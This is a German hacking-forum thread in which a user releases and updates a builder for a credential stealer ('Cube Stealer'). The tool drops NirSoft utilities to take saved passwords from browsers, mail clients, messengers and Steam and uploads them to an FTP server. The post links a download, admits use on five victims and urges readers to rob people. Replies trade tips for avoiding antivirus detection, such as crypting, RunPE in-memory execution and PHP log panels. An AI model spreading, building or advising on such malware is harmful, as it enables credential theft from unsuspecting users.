39 Antworten in diesem Thema

[Cube]

EDIT:
Neue Version findet man weiter untem im Thread!

Da dieses Board ja praktisch ne TOOLbase ist, wollte ich ebenfalls mal was dazu beisteuern. Seit kurzem bin ich wieder in das SzeneLeben eingestiegen und musste zu meinem Bedauern festellen, dass es keinen Password Stealer gibt, welcher alle aktuellen BrowserPasswörter stealt. Wenn es doch der Fall ist, belehrt mich eines besseren
Wie dem auch sei habe ich mir Gedanken gemacht selbst etwas zusammenzubasteln.
Obwohl ich mich nur mit C/C++ beschäftige, fand ich über Umwege auf die Nirsoft Tools inkls. eines behindertengerechten Tutorials von Spamferkel für die Impementierung in Visual Basic .Net

Da für VB sowieso deartig viele Sources und Snippets im WWW kusieren, habe ich das gleich hergenommen und zu meinem Vorteil genutzt.
Es sollte gleich erwähnt sein, dass das ganze lediglich schnell hingefetzt ist und für meine Zwecke vollkommen gereicht hat.
Außerdem sind meine Programmierkünste sehr sehr bescheiden

Builder Tutorial:

Please Login HERE or Register HERE to see this link!

Nirsoft Tutorial:

Please Login HERE or Register HERE to see this link!

Ich war allerdings so frei und hab noch ne halbwegs ansehbare GUI drumherumgebastelt und nen Builder draus gemacht (stealt außerdem noch diverse MailClients & Messenger) , damit es auch jeder Noob gebacken bekommt ne funktionierende Server.exe zu erstellen ...

Please Login HERE or Register HERE to see this link!

Hübsches Ding nicht? Und der Name erst! *Sarkasmus off*


Wenns war ist stealt der folgende Dinge (Chrome, Firefox, Outlook funktioniert einwandfrei, da selbst getestet):

• Internet Explorer
• Firefox
• Chrome
• Opera
• Safari

• Outlook
• Windows live Mail
• Mozilla Thunderbird
• IncrediMail

• Windows Live Messenger
• Trillian
• Miranda
• ICQ (nur alte Versionen)

Für genauere Infos siehe

Please Login HERE or Register HERE to see this link!

ACHTUNG: Der Stealer weist einige Sicherheitsprobleme auf, unter anderem sind eure FTP daten äußerst leicht mitzusniffen oder gleich auszulesen. Nicht, dass dann jemand jammert wie scheiße der eigentlich ist. Es ist somit erwähnt

FTP Daten eingeben, Testen, Server builden, Leute beklauen und ein schlechtes Gewissen kriegn.

Und nochwas : Hier sind natürlich die Scans!

Builder:

Please Login HERE or Register HERE to see this link!

Stub:

Please Login HERE or Register HERE to see this link!

Viel Spaß. Achja und bevor ichs vergesse: Es würde mich noch interessieren, wenn das jemand testet, was NICHT gestealt wird von den genannten Applikationen und bitte um Feedback deswegen, nur rein aus Interesse danke!

Downloadlink:

Please Login HERE or Register HERE to see this link!

PS: Bevor hier jetzt Kiddies rumjammern, das Ding is clean. Mit UPX gepackt + obfuscated (damit nicht jeder 1337 Haxor an den Source kommt). Da ich noch praktisch ein 0 Poster bin, is Skepsis durchaus gerechtfertigt. Nutzt ne Virtual Maschine, Sandboxie oder what ever. *Peace*

[juPP]

Coole Sache! Auch wenn ich dabei keine Verwendung habe.

Stealt er nur gespeicherte Passwörter? oder hast du sowas wie ein Formgrabber implementiert?

[Cube]

Coole Sache! Auch wenn ich dabei keine Verwendung habe.

Stealt er nur gespeicherte Passwörter? oder hast du sowas wie ein Formgrabber implementiert?

Nope da wie eben schon gesagt meine CodingKünste leider Gottes noch sehr beschränkt sind, wird das demnächst mit Formgrabbing noch nichts.
Aber man lernt ständig was neues, vielleicht ist es eines Tages soweit

Da ich aber gerade etwas Zeit habe, und ich mich mit Vb.Net beschäftige, bin ich gerade dabei die SteamUsername Option zu implementieren.
Wird die Woche noch geupdated wenn nichts dazwischen kommt

Bearbeitet von Cube, 04 March 2014 - 19:23 Uhr.

[sup3ria]

Abgesehen davon das es 80% Copy&paste solltest du dir mal die Frage stellen ob du wirklich "deinen" Code wirklich so hart vergewaltigen willst mit dem Confuser. Man wird die stub deshalb auch nicht crypten können mit Hax0rr Cryptern. Und wo bitte ist UPX??????

Wirklich mal warum sollte man sowas mit Confuser obfuscaten. Die stub alleine wird schon über 100 % größer dadurch.

Scheint aber Clean zu sein.

Hier die Source:

Please Login HERE or Register HERE to see this link!

[Bloodman]

es währe sehr cool wende die funktion einbauen könntest das er die logs auch an php schickt nimm einfach istealer base dafür oder so aber sieht erstmal sehr nett aus

MFG
Bloodman

Bearbeitet von Bloodman, 05 March 2014 - 05:01 Uhr.

[Cube]

@sup3ria
Dein Ruf für deine konstruktive Kritik eilt dir vorraus. Hab dich deutlich freundlicher und kompetenter in Erinnerung. Aber vielleicht verwechsel ich dich auch nur.

Da es auch dazugehört Kritik einzustecken werd ich auch auf diese eingehen.

Fangen wir an: Zunächst einmal habe ich geschrieben das praktisch alles abgekupfert ist. Desweiteren habe ich unter den Abouts die notwendigen Credits vergeben.Ich weis also nicht was dein Problsm ist. Anscheinend darf man heutzutage nichts mehr publizieren selbst wenn Credits erwähnt sind. Tja man kann es niemandem recht machen.

Weiter geht es mit dem Confuser: Ich habe es bewusst damit obfuscated, damit ... wenn du meinen thread komplettgelesen hättest auch schon wüsstest... nicht jeder 1337 leet haxxor an den source kommt. Aber da du absolut keine Rücksicht auf meinen Wunsch nimmst machst du den source public. Du bist echt ein held.

Und weiter gez mit UPX: ich hab lediglich die nirsoft tools gepackt für die size damit die stub kleiner wird. Und im confuser hab ich ebenfalls den packer genutzt. Vielleicht etwas undeutlich formuliert von mir.

Also möchte ich mich nochmal sarkastisch Bedanken, dass du den Source reversed hast. Deine kritik is in meinen Augen zum Großteil überflüssig. Nichts destotrotz wünsch ich dir noch einen schönen Tag.

@Bloodman
Panelfunktion liegt noch in der Zukunft. Aber danke für den istealer tipp. Man wird sehen wie sich das ganze entwickelt


PS: Man entschuldigt meine Rechtschreifehler, da alles vom Smartphone geschrieben ist.

PSS: Laut einer Quelle im World Wide Web ist Spamferkel gleich Sup3ria. Erklärt eventuell die etwas eingeschnappte Haltung
Ich sage nicht dass es stimmt, aber wenn es so ist sehe ich dafür keinen Grund. Wurdest vermerkt. Grüße

Bearbeitet von Cube, 05 March 2014 - 13:40 Uhr.

[Bloodman]

jo werde gespannt sein

MFG
Bloodman

[Aaron]

@ Cube
Die Kritik von sup3ria hast du wohl etwas zu streng genommen.
Dein Tool aber macht kaum etwas. Es droppt eben die Nirsoft-Tools und lädt die Ergebnisse auf den FTP.
Nun, ob es wirklich so geschützt werden muss...hm...das lasse ich eben offen stehen.
Ich glaube sup3ria vergleicht dein Auffand das Tool zu schreiben mit dem Aufwand es zu schützen.
Ich glaube da liegt der Hund begraben. Wie sollen den die Anfänger lernen wenn man selbst solch banale Sources nicht frei gibt?
Du hast ja selbst erwähnt es aus dem Netz zusammengeschustert zu haben. Sprich: Man hat es eben frei gepostet damit auch die Anderen etwas davon haben. Genau so solltest auch du mit den Anderen umgehen.

OK, so viel dazu.
Betrachte es bitte nicht als Kritik. Das hat sup3ria schon übernommen. Ich möchte dich nur darauf hinweisen dass auch ich daraus lernen könnte, wenn du es anders gehandhabt hättest.

Ach ja, nur noch etwas zum Pannel. Mehr als ein Script um die Daten aufzunehmen und ein Script (Pannel) ist nicht dabei.
Frag doch einfach in Forum nach, es findet sich sicherlich Jemand der es mit dir teilt. Dafür ist das Forum da.
Und dann statt auf FTP einfach per Webrequest senden. Das sollte aber das kleinste Problem sein.

[Cube]

@ Aaron
Wenn ich mir die Posts von sup3ria so ansehe dürfte er generell ein recht strenger und direkter Spielgefährte sein. Und für meinen Geschmack zu überheblich. Darf zum Glück jeder für sich selbst entscheiden.

b2T: Wenn du dich dafür interessierst werde ich sofort wenn ich wieder zu Hause bin die besagten Tutorials von Spamferkel und vb-paradise verlinken (im StartThread). Denke den Rest wirst du dann selbst gebacken kriegen
Hätt ich vlt schon von Anfang an machen sollen. Man verzeihe mir.
Und das Panel hab ich bewusst nicht eingebaut, da ich den Stealer genau bei 5 Vics angewandt habe und das bewusst. Der Aufwand wäre dafüt zu groß gewesen. Ein FTP hat hier gereicht. Aber eben schon wie erwähnt: Wenns mich reizt mach ich was besseres draus.

Bezüglich des Sources: Das ist eine Toolbase. Zumindest verspricht das die Domain und eben kein CodingBoard. Wenn ich den Source präsentieren will veröffentliche ich ihn beispielsweise auf coderz.cc oder eben hier im passenden SubForum.

Grüße Cube

Bearbeitet von Cube, 05 March 2014 - 12:12 Uhr.

[Aaron]

Danke für dein Verständnis. Ich habe schon mit mehr Aggressivität gerechnet.
Nun, mich habe ich mehr oder weniger als Muster genannt, leider reagieren die Leute sehr komisch wenn man einen nennt.
Ich nenne dann eben mich selbst , damit beleidige ich Keinen.
Persönlich bin ich nicht wirklich an dem Code interessiert. Ein Dropper ist nicht gerade schwer zu schreiben.
Das kriege ich auch noch hin.
Danke aber für die positive Reaktion. Das mag ich gerne lesen.

[Cube]

Is doch kein Ding. Wie versprochen sind die Tuts hinzugefügt worden
Und ja du hast recht. Dropper sind nicht schwer zu realisieren. Ich habe mich bisher allerdings nicht mit .Net auseinandergesetzt und da war dann Hilfe nötig
Hab auch nicht behauptet, dass es eine Herausforderung war diesen High-End Stealer zusammenzusetzen. Aber die Not macht erfinderisch hehe.

Viel Spaß damit!

[Aaron]

Ich habe 2 interessante Tools (nicht von mir) gepostet. Für .NET kann man die gut gebrauchen.
Darf ich fragen welche Sprache du bis jetzt gecodet hast?
Vielleicht besser per PN, sonst spamt es hier alles voll.

[sup3ria]

Also Ich wollte ausdrücken das man nicht seine Assembly mit dem Confuser obfuscaten muss wenn der Code quasi eh Copy & Pasted ist.
Auch kann man die obfuscated Assembly nicht Crypten mit gängigen PE Cryptern, was allerdings ja eh egal ist da die Nirsofttools getroppt werden.

Keine Sorge wegen dem Quelltext. Den kann man nicht einfach compilen. Also wird deine Absicht erhalten, "Script-Kiddies" können das nicht verwenden.

Ich würde im Builder die Nirsofttools Binarys dynamisch hinzufügen, so kann der Benutzer die Tools noch vorher crypten dann macht das droppen auch nicht so viel aus.

Und wie gesagt bitte nicht Confuser...kann man nicht crypten ;-)

[Cube]

Also Ich wollte ausdrücken das man nicht seine Assembly mit dem Confuser obfuscaten muss wenn der Code quasi eh Copy & Pasted ist.
Auch kann man die obfuscated Assembly nicht Crypten mit gängigen PE Cryptern, was allerdings ja eh egal ist da die Nirsofttools getroppt werden.

Keine Sorge wegen dem Quelltext. Den kann man nicht einfach compilen. Also wird deine Absicht erhalten, "Script-Kiddies" können das nicht verwenden.

Ich würde im Builder die Nirsofttools Binarys dynamisch hinzufügen, so kann der Benutzer die Tools noch vorher crypten dann macht das droppen auch nicht so viel aus.

Und wie gesagt bitte nicht Confuser...kann man nicht crypten ;-)

Das mit dem confusen muss ich dir im Nachinhein recht geben. Macht außerdem wie du schon erwähnt hast die Stub abartig groß obwohl auch schon Ressourcen dabei sind...nicht gerade optimal.
Desweiteren hab ich den decompiled Source von dir gerade angsehen. Du hast recht ist ist nicht direkt kompilierbar daher passt das schon so.

Das dynamische hinzufügen der Ressourcen ist keine schlechte Idee, werd ich demnächst mal hinzufügen. Warum ich nicht gleich drauf gekommen bin Ermöglicht das crypten somit. Hast du natürlich recht.

Jetzt stellt sich nur eine Frage für mich. Wenn ich das ganze dynamisch mit den Nirsoft Tools angehe, und sie dann der Stub beigefügt wurden, ist das ganze dann im nachinein trotzdem nicht cryptbar oder?
Die Nirsoft Tools, kann man dann zwar vorher selbst etwas modden um die Detections wegzubekommen, aber den fertigen Server kann ich dann nicht mehr crypten da sonst die Ressourcen geschrottet werden? Oder liege ich da falsch.

Grüße

[sup3ria]

Du könntest die tools als ByteArray reinschreiben, wo bei Ich nicht so weiß wie groß das Ganze werden wird.
Am besten noch mit z.B. GzipStream oder so compressen.
Ansonsten könntest du auch die Nirsofttools hardcoden als verschlüsselter bytearray und dann via RunPE ausführen. Hat dann keine Drops und man muss die Tools nicht crypten.

[Cube]

So. Da ich gerade etwas Zeit hatte, hab ich etwas an dem Stealer weitergecodet.
Für mich persönlich war vorallem der SteamUsername noch recht wichtig.
Dies ist nun auch implementiert. Hier ist ne generelle Liste an Änderungen:

• Steal SteamUsername
• GUI überarbeitet
• FTP Daten werden nun verschlüsselt in die Stub geschrieben
• Code wurde etwas verbessert
• Confuser wurde wegelassen um die Stub-Größe deutlich zu verringern

Hier noch ein neuer Screen vom Builder:

Please Login HERE or Register HERE to see this link!

BuilderScan:

Please Login HERE or Register HERE to see this link!

StubScan:

Please Login HERE or Register HERE to see this link!

Das nächste Mal werde ich versuchen Stealoptions für Filezilla, Skype und jDownloader zu implementieren.
Denke das dürfte auch noch recht interessant sein
BIn beim Recherchieren (nur so nebenbei für die Info) auf diese Seite gestoßen

Please Login HERE or Register HERE to see this link!

Falls es jemanden interessiert

Außerdem wird irgendwann vielleicht noch ein Iconchanger/Assembly Information Changer und File Spoofer hinzugefügt.
Aber das wird noch etwas dauern, da dass dann nur mehr Schönheitssachen sind.
Gibt ja schon derartig viele selfcoded Tools mit denen man die genannten Optionen extern durchführen kann

Bei mir funktioniert der Stealer äußerst gut und er erfüllt die für mich persönlichen Kriterien.
Sollte den jemand testen und auf Bugs stoßen gebt ruhig Auskunft.

Vielleicht findet der ein oder andere ja Verwendung für das Tool.
Viel Spaß

PS: Hier noch ein Screen wie die Logs auf den FTP Server aussehen:

Please Login HERE or Register HERE to see this link!

Downloadlink: http://www.xup.in/dl,11816632/Cube_Stealer_Beta.rar/

Bearbeitet von Cube, 15 March 2014 - 15:45 Uhr.

[tpetter]

jdownloader und jdownloader 2 wäre eine feine sache! Vielleicht kannst du das noch einbringen

[Cube]

jdownloader und jdownloader 2 wäre eine feine sache! Vielleicht kannst du das noch einbringen

Das ist lediglich ne Beta version. Also ich meine der Jdownloader ZWEI oder?
Wüsste nicht, dass den schon so viele verwenden?

[Panther96]

Oder ne Funktion für VPN wäre auch super....

[Cube]

Oder ne Funktion für VPN wäre auch super....

Was genau meinst du mit "VPN Funktion"
Etwas klarer solltest du dich schon ausdrücken.

Man könnte noch razz fazz dies hier hineinquetschen:

Please Login HERE or Register HERE to see this link!

Dann wird die Stub aber wieder um ~75Kb größer.
Oder willst du auf eine bestimmte Software hinaus?